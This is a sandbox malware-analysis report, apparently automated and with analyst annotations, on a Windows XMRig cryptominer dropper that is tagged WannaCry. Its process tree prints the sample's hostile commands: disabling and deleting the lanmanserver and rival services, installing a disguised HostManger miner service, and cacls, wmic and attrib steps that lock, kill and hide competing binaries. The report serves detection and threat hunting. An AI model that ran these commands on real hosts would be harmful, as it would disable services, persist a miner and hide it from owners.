Analysis
  max time kernel: 151s
  max time network: 166s
  platform: windows7_x64
  resource: win7-20220414-en
  submitted: 08-07-2022 01:50

Behavioral task: behavioral1
  Sample: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  Resource: win7-20220414-en

General
  Target: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  Size: 2.3MB
  MD5: 7b4f33a283fc64db1227f5d82db91a59
  SHA1: f32ae945c419e09e3320686f2b9b419c346d76a3
  SHA256: 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a
  SHA512: 7c59bc1028115acbda27245a8f14638892a3fbae1ac409ec62448f9ad580fd3051bdaef751b7d8f6e81df80a23098201de386082e229a768a6142a514ee85511
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm. Caveat for this run: the report records no file encryption. What links the sample to WannaCry is that it stops and deletes the services mssecsvc2.0 (WannaCry's service name) and mssecsvc2.1 and runs attrib against C:\Windows\tasksche.exe (WannaCry's dropper name), see the process tree and the "Drops file in Windows directory" list. That is consistent with the sample clearing a prior WannaCry infection off the host before installing its own service, so read the tag as a name/behaviour match, not as a classification of this sample as WannaCry.
-
Detected Stratum cryptominer command 3 IoCs
Looks to be attempting to contact a Stratum mining pool. The two svchost.exe instances here are the dropped C:\Windows\Fonts\svchost.exe, not the system binary.
Processes:
  pid   process
  2540  svchost.exe
  3048  svchost.exe
  1592  KvMonXP.exe
-
XMRig Miner payload 5 IoCs
Processes:
  resource                                                                      yara_rule
  behavioral1/memory/1892-55-0x0000000000400000-0x0000000000656000-memory.dmp  xmrig
  \??\c:\windows\Fonts\lsass.exe                                                xmrig
  C:\Windows\Fonts\lsass.exe                                                    xmrig
  \Windows\Fonts\KvMonXP.exe                                                    xmrig
  C:\Windows\Fonts\KvMonXP.exe                                                  xmrig
The first match is the image of the submitted sample itself (PID 1892, 0x400000 to 0x656000, roughly the 2.3MB file size), so the miner code is present in the dropper and is written out as lsass.exe and KvMonXP.exe under C:\Windows\Fonts rather than downloaded.
Executes dropped EXE 16 IoCs
Processes:
  svchost.exe (the dropped C:\Windows\Fonts\svchost.exe): pids 1164, 1492, 1868, 664, 880, 2548, 2564, 2540, 2556, 2776, 3048, 3064, 3056, 2052
  lsass.exe (C:\Windows\Fonts\lsass.exe): pid 1760
  KvMonXP.exe (C:\Windows\Fonts\KvMonXP.exe): pid 1592
-
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
  netsh.exe: pids 2616, 2892, 2912, 3008 (the netsh command lines are not included in this extract)
-
Sets file to hidden 1 TTPs 7 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
  attrib.exe: pids 3036, 3052, 2472, 2836, 2696, 2512, 2132
Stops running service(s) 3 TTPs
Services stopped with net stop and then removed with sc delete (see the process tree): lanmanserver (the Server service that hosts SMB shares, which is also what MS17-010-style SMB worms target; the sample additionally sets it to start= DISABLED), mssecsvc2.0 and mssecsvc2.1 (WannaCry's service names), and a set of look-alike service names: ServiceSaims, ServiceSais, HostManger, Hostserver, ServiceMaims, ServicesMain, FormManger, Famserver, RpcEptManger, samserver, WinNsaSrv. One of these, HostManger, the sample then re-creates for itself with c:\windows\Fonts\lsass.exe as the service binary.
-
UPX packed file (yara rule upx; the heading is missing from the extracted page and is taken from the rule name)
Processes:
  resource: \Windows\Fonts\svchost.exe, C:\Windows\Fonts\svchost.exe and \??\c:\windows\Fonts\svchost.exe (matched repeatedly, once per on-disk copy/event)
  resource: behavioral1/memory/<pid>-<n>-0x0000000140000000-0x0000000140053000-memory.dmp for pids 1164, 1492, 1868, 664, 880, 2548, 2564, 2540, 2556, 3056, 2052, 3048, 3064, 2776 (several pids matched more than once)
  yara_rule: upx
Every matching pid is one of the dropped Fonts\svchost.exe instances from "Executes dropped EXE"; lsass.exe and KvMonXP.exe do not match. The 0x140000000 base is the default image base of a 64-bit PE, so the dropped svchost.exe is a 64-bit binary, while the submitted sample is 32-bit (its children run from C:\Windows\SysWOW64).
Deletes itself 1 IoCs
Processes:
  pid   process
  1336  WScript.exe
-
Loads dropped DLL 10 IoCs
Processes:
  pid   process
  1892  42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  2596, 2616, 2604, 2636, 772, 2132, 2112, 2056  (image names not preserved in the extract)
  2776  svchost.exe
Drops file in Windows directory 64 IoCs
(Several lists in this report stop at exactly 64 entries, which is where the sandbox truncates them; read "64 IoCs" as "at least 64".)
Processes (deduplicated):
  description                   ioc                               process
  File created                  \??\c:\windows\Fonts\lsass.exe    42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  File created                  \??\c:\windows\Fonts\svchost.exe  42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  File created                  \??\c:\windows\Fonts\KvMonXP.exe  lsass.exe
  File opened for modification  C:\Windows\debug\lsmose.exe       attrib.exe
  File opened for modification  C:\Windows\tasksche.exe           attrib.exe
  File opened for modification  C:\Windows\svchost.exe            attrib.exe
  File opened for modification  C:\windows\debug\svchost.exe      attrib.exe
  File opened for modification  C:\Windows\Fonts                  attrib.exe  (all remaining entries in the list)
So the sample writes svchost.exe and lsass.exe into C:\Windows\Fonts, and lsass.exe in turn writes KvMonXP.exe there; the other paths are competitor files the batch script hides.
Launches sc.exe 64 IoCs
sc.exe is the Windows utility for controlling services; here it is used to disable and delete them (see the process tree).
Processes:
  sc.exe: pids 2492, 2948, 1324, 2020, 2140, 2712, 3024, 1844, 1788, 2156, 1060, 1700, 1764, 1544, 2232, 1716, 1412, 1236, 2324, 1112, 2016, 360, 1716, 1264, 1956, 1580, 880, 1260, 2920, 624, 772, 1888, 1544, 2340, 3000, 1792, 276, 524, 2796, 520, 1800, 2220, 696, 812, 2300, 2404, 1704, 2464, 2824, 2368, 1412, 1992, 2208, 2984, 1644, 1264, 1464, 2448, 848, 2892, 2880, 2936, 1724, 520 (pids such as 520, 1264, 1412, 1544 and 1716 recur because Windows reuses process ids during the run)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox describes this as likely ransomware behaviour; note that no encryption activity is recorded anywhere else in this report.
-
Kills process with WMI 23 IoCs
Processes:
  WMIC.exe: pids 2120, 2340, 2332, 2468, 2744, 1444, 2316, 2872, 1524, 2640, 2112, 2212, 2244, 2972, 2232, 2416, 2588, 2636, 1036, 2392, 2728, 2888, 1996
-
Kills process with taskkill 10 IoCs
Processes:
  taskkill.exe: pids 1116, 1804, 2004, 1300, 1792, 1892, 2224, 1932, 1816, 1952
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  1760 lsass.exe (the dropped C:\Windows\Fonts\lsass.exe; 64 process-enumeration events, all from this pid)
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid 468 (image name not preserved in the extract)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  1036 WMIC.exe: enables SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and privilege LUIDs 33, 34, 35 (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege); the whole set is recorded twice
  1300, 1816, 1932, 1116, 1952, 1792 taskkill.exe: SeDebugPrivilege
  2120 WMIC.exe: the same set as pid 1036, cut off after LUID 33 by the 64-entry limit
Enabling every privilege in its token is what wmic.exe does on every start, so the WMIC entries are expected for any wmic invocation; the taskkill.exe entries show SeDebugPrivilege being enabled to terminate processes the sample does not own.
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe (2 events)
  1760 lsass.exe (2 events)
Suspicious use of WriteProcessMemory 64 IoCs
Processes (each parent/child pair appears four times in the raw list; deduplicated here, 16 pairs in all):
  parent                                                                          child
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  688 cmd.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1728 net.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  956 sc.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1324 sc.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1264 net.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1236 sc.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  2028 net.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  520 sc.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  580 net.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1792 sc.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1764 net.exe
  1892 42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe  ->  1956 sc.exe
  688 cmd.exe   ->  316 attrib.exe
  1728 net.exe  ->  568 net1.exe
  1264 net.exe  ->  1704 net1.exe
  2028 net.exe  ->  368 net1.exe
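The raw list above runs every "PID A wrote to memory of B" record together and repeats each pair four times. As an added example (not sandbox tooling, and not part of the report), this Python parses records of that shape back into a parent/child tree. SAMPLE is a constructed excerpt of the records listed above, with the four-fold repetition reproduced; the image names and pids are the report's.

```python
"""Rebuild the process tree from the flattened 'wrote to memory of' records.
Added example; it parses the report's text and is not sandbox tooling."""
import re
from collections import defaultdict

# One record, as the report prints it (the parent pid is repeated before the images):
#   PID <ppid> wrote to memory of <pid> <ppid> <parent image> <child image>
# \s+ rather than a literal space, because the extract breaks lines mid-record.
RECORD = re.compile(
    r"PID\s+(?P<ppid>\d+)\s+wrote to memory of\s+(?P<pid>\d+)\s+(?P=ppid)\s+"
    r"(?P<pimage>\S+)\s+(?P<image>\S+)"
)

SAMPLE_EXE = "42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"

# Constructed excerpt of the records above; the sandbox logs the same pair four
# times (one WriteProcessMemory call each), so duplicates are expected input.
SAMPLE = " ".join(
    [f"PID 1892 wrote to memory of 688 1892 {SAMPLE_EXE} cmd.exe"] * 4
    + [f"PID 1892 wrote to memory of 1728 1892 {SAMPLE_EXE} net.exe"] * 4
    + [f"PID 1892 wrote to memory of 956 1892 {SAMPLE_EXE} sc.exe"] * 4
    + ["PID 688 wrote to memory of 316 688 cmd.exe attrib.exe"] * 4
    + ["PID 1728 wrote to memory of 568 1728 net.exe net1.exe"] * 4
)


def parse_tree(text):
    """Return (parent_of, children_of, image_of) with repeated records collapsed.

    Caveat: Windows reuses pids within a run (this report lists 520 and 1716 as
    sc.exe twice, and 1792 as both sc.exe and taskkill.exe); when parsing a
    whole report, key nodes on (pid, image) and on record order, not on pid alone.
    """
    parent_of, image_of, children_of = {}, {}, defaultdict(list)
    for m in RECORD.finditer(text):
        ppid, pid = int(m["ppid"]), int(m["pid"])
        image_of.setdefault(ppid, m["pimage"])
        image_of.setdefault(pid, m["image"])
        if pid not in parent_of:          # first sighting wins; later ones are repeats
            parent_of[pid] = ppid
            children_of[ppid].append(pid)
    return parent_of, dict(children_of), image_of


def render(text):
    """Indented tree, one 'pid image' line per process, roots first."""
    parent_of, children_of, image_of = parse_tree(text)
    roots = [p for p in children_of if p not in parent_of]
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {image_of[pid]}")
        for child in children_of.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render(SAMPLE)))
```

On the excerpt this yields the sample at the root with cmd.exe, net.exe and sc.exe beneath it, attrib.exe under cmd.exe and net1.exe under net.exe, which is the same shape the process tree section below shows in full.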
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
  attrib.exe: pids 1692, 1712, 2656, 2808, 2864, 2800, 2608, 2360, 1424, 2444, 2528, 700, 1936, 2920, 3044, 1484, 2684, 1372, 1276, 1468, 2472, 2368, 2248, 2964, 1116, 2544, 2420, 2824, 2456, 1668, 2380, 2708, 2988, 2160, 832, 1596, 2212, 2836, 2292, 2612, 1324, 2320, 2700, 2856, 2544, 2052, 2200, 832, 2284, 2512, 2184, 2372, 2344, 2604, 316, 1852, 2600, 3000, 2308, 1300, 2556, 2088, 2720, 2552
Processes
-
C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe
  command: "C:\Users\Admin\AppData\Local\Temp\42a7636248e5972bf5c790eb5c13f93716821d4606644adf0b18a26826179f2a.exe"
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe
    command: cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\attrib.exe
      command: attrib -s -h -r -a C:\Windows\Fonts
      - Views/modifies file attributes

  C:\Windows\SysWOW64\net.exe
    command: net stop lanmanserver /y
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop lanmanserver /y

  C:\Windows\SysWOW64\sc.exe
    command: sc config lanmanserver start= DISABLED 2>nul

  C:\Windows\SysWOW64\sc.exe
    command: sc delete lanmanserver
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop mssecsvc2.0
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop mssecsvc2.0

  C:\Windows\SysWOW64\sc.exe
    command: sc delete mssecsvc2.0

  C:\Windows\SysWOW64\net.exe
    command: net stop mssecsvc2.1
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop mssecsvc2.1

  C:\Windows\SysWOW64\sc.exe
    command: sc delete mssecsvc2.1
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop ServiceSaims

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop ServiceSaims

  C:\Windows\SysWOW64\sc.exe
    command: sc delete ServiceSaims
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop ServiceSais

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop ServiceSais

  C:\Windows\SysWOW64\sc.exe
    command: sc delete ServiceSais
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop HostManger

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop HostManger

  C:\Windows\SysWOW64\sc.exe
    command: sc delete HostManger
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop Hostserver

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop Hostserver

  C:\Windows\SysWOW64\sc.exe
    command: sc delete Hostserver
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop ServiceMaims

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop ServiceMaims

  C:\Windows\SysWOW64\sc.exe
    command: sc delete ServiceMaims
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop ServicesMain

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop ServicesMain

  C:\Windows\SysWOW64\sc.exe
    command: sc delete ServicesMain
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop FormManger

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop FormManger

  C:\Windows\SysWOW64\sc.exe
    command: sc delete FormManger

  C:\Windows\SysWOW64\net.exe
    command: net stop Famserver

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop Famserver

  C:\Windows\SysWOW64\net.exe
    command: net stop RpcEptManger

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop RpcEptManger

  C:\Windows\SysWOW64\sc.exe
    command: sc delete Famserver
    - Launches sc.exe

  C:\Windows\SysWOW64\sc.exe
    command: sc delete RpcEptManger
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop samserver

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop samserver

  C:\Windows\SysWOW64\sc.exe
    command: sc delete samserver
    - Launches sc.exe

  C:\Windows\SysWOW64\net.exe
    command: net stop WinNsaSrv

    C:\Windows\SysWOW64\net1.exe
      command: C:\Windows\system32\net1 stop WinNsaSrv

  C:\Windows\SysWOW64\sc.exe
    command: sc delete WinNsaSrv
    - Launches sc.exe

  \??\c:\windows\Fonts\svchost.exe
    command: c:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe
    - Executes dropped EXE

  \??\c:\windows\Fonts\svchost.exe
    command: c:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.
    - Executes dropped EXE

  \??\c:\windows\Fonts\svchost.exe
    command: c:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger
    - Executes dropped EXE

  \??\c:\windows\Fonts\svchost.exe
    command: c:\windows\Fonts\svchost.exe start HostManger
    - Executes dropped EXE

  (note: the install <service> <binary> / set <service> <parameter> <value> / start <service> verbs are the command syntax of the NSSM service wrapper, which would make the dropped 64-bit, UPX-packed svchost.exe a renamed NSSM and HostManger an NSSM-managed service running the miner loader c:\windows\Fonts\lsass.exe. The report itself does not identify the binary, so treat that as an inference from the syntax. The persistence to hunt for is a service named HostManger, display name "HOST Endpoint Manger", whose binary lives under C:\Windows\Fonts.)
  C:\Windows\SysWOW64\cmd.exe
    command: cmd /c c:\windows\hosts1.bat
    (note: each `C:\Windows\system32\cmd.exe /S /D /c" echo y"` below is the left-hand side of an `echo y | cacls ...` pipe inside hosts1.bat, answering the confirmation prompt cacls prints; `/p everyone:n /d system` replaces the target file's ACL with no access for Everyone and an explicit deny for SYSTEM, so a competing binary at that path can neither be started nor replaced. Each `wmic process where "name='...' and ExecutablePath='...'" call Terminate` kills a running copy of such a binary by exact path, and the attrib +s +h +r calls hide the file. The paths are ones used by other malware installs; the sample is clearing them out of the way before its own miner runs.)

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\Windows\system32\seser.exe /p everyone:n /d system

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate
      - Kills process with WMI
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate
      - Kills process with WMI
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\attrib.exe
      command: attrib +s +h +r C:\ProgramData\vmicvess\svchost.exe
      - Sets file to hidden
      - Views/modifies file attributes

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\attrib.exe
      command: attrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe
      - Sets file to hidden
      - Views/modifies file attributes

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\windows\fonts\help\services.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\windows\temp\conhost.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\attrib.exe
      command: attrib +s +h +r C:\Windows\debug\lsmose.exe
      - Sets file to hidden
      - Drops file in Windows directory

    C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /S /D /c" echo y"

    C:\Windows\SysWOW64\cacls.exe
      command: cacls C:\Windows\debug\lsmose.exe /p everyone:n /d system

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate
      - Kills process with WMI

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      command: wmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate
      - Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\services.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exe (depth 2)
cmd /c c:\windows\hosts.bat
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop COMSysCts
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete COMSysCts
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop WmSrv
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete WmSrv
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop WmiAppSrv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete WmiAppSrv
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop "RegCsv COMSysApp"
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete "RegCsv COMSysApp"
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop hasplms
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete hasplms
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop hasp1ms
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete hasp1ms
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop serviceing
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete serviceing
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop SQLWriter$
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete SQLWriter$
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop IPSECS
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete IPSECS
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop MicrosoftFonts
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc delete MicrosoftFonts
-
C:\Windows\SysWOW64\sc.exe (depth 3)
sc stop Microsoft_Update
